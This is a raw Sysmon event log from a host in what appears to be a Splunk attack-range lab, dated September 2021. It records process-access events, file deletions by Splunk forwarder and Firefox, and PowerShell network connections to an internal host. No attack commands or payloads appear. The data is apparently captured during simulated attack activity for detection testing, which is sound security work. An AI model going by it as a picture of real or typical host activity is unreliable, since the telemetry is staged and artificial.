Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498907Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:24:24.134{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498906Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.134{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498905Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:24:24.133{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498904Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.133{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A288-6140-BE56-04000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498903Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:24:24.133{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498902Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.133{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A288-6140-BE56-04000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498901Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.115{B81B27B7-A288-6140-BE56-04000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498921Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:25.881{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=31B46D74396AD8A2752FB3979E7E5527,SHA256=061CC63FB57871002131635FB4BA3320CE7C2EE1B0772EADAEE09DB99EDFB190,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498920Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:25.332{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B9FB00E0057A535AC25DE42FE5E42DD9,SHA256=14543053D08FC67AD3CE53B32D24A9B6D52382DAFE645DEA62F20E93D15A1545,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036498919Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:25.234{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6D11FD457C688D401739EB4E2B57409,SHA256=3220674BAB5428097EF4078AC3155C34AB4D9F93F72CD4A7D894D85F3013ACBC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498929Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:56.359{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50705-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498928Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:26.249{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9A1ED992CD2968415EF48382EB17F80,SHA256=B2DCD06977FE7BAEBA945469BF8070FCA84142073799392DA784BA1E6D976502,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498927Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:26.181{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=B9C2A1F273E549966B66120897EACA49,SHA256=47552A9C3B57E9D65C548CCE7FA77CCD8B596953B8DF74E9A30A709B5E129DE0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient 
disk space 23542300x800000000000000036498926Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:26.181{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=64710045BF4F1F2AFF774351F1842193,SHA256=080EFA6818DCD60962B8FAC70B2559EFD00745277C96DAE23DA56129FF7E9775,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498925Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:26.181{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=A0AC60177B7F6F290511E087D1983BB0,SHA256=FB54B6CC4B9595BDF9CDE266DF3E2D989B5B68A8FC332C21EB91FA0EB36B1881,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498924Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:26.181{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=A2D24C65B480ED64FAA4EB0BE916467C,SHA256=B8E5033A1664C20CA0FDBF098AD5CB25F11975B20DEE05E3EDB941ADDD2510B1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498923Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:26.181{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=E4380F93E2CA4811A2FD1A4AC3A48709,SHA256=8B804544480187642D4C4DAE94417798E8D2EA3CF8BEAC75C58C9D470D212B93,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498922Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:26.181{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=3916CBD98C5A65B6154539DE89472EF2,SHA256=AD3D477F4F400019F91827DD07FD83D2555B52297887862E6D99FA138FF6D96C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498931Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:57.924{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50706-false10.0.1.12-8000- 23542300x800000000000000036498930Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:27.310{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCC8CB5092BE4DFC22C57D5D291E0514,SHA256=F037174D414C549BFDB4BADF4BFB1D1E5B922164769DCB4A6E808B9B82BE42F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498932Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:28.330{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=260358616A66FBCF16B918A326052B6D,SHA256=DED6861912C829B7EDBB83500E1AD7762EBDE21E043BEEA42BB0F2BF35F87614,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498934Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:29.708{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3C303B99F11254D0CBDD7811E67B6070,SHA256=3731B32D73D89F6E38E47CA35FB949FC7C331CE6B1CB8785DBDB84AAEE701B2F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498933Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:29.361{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C62C99FD232D369847A6462B6A579FD,SHA256=350E54F43F2291C18224BF2D024095A35B4A9E167177E2C4FE61589AE02EC7B0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498936Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:25:00.371{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50707-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498935Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:30.376{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B77390B29DE09E846F2AB192F64DA30,SHA256=043C12D90D584667C118803996163C019C7F530B236E82FA0EED295C25523B72,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498937Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:31.406{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12587E7B636DC93437E78E19EEEEB776,SHA256=A84543F845A7296D4A27B33DECBCF2402BFB46DB5E843C19D691366C7B10349E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498939Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:32.689{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498938Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:32.427{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C60D3D4216703AA10C6766AB19D79D2F,SHA256=A775A21EE7E8323011C7F6FCF7F2379D65F2D174BFB5117CD96FF30353597AE6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space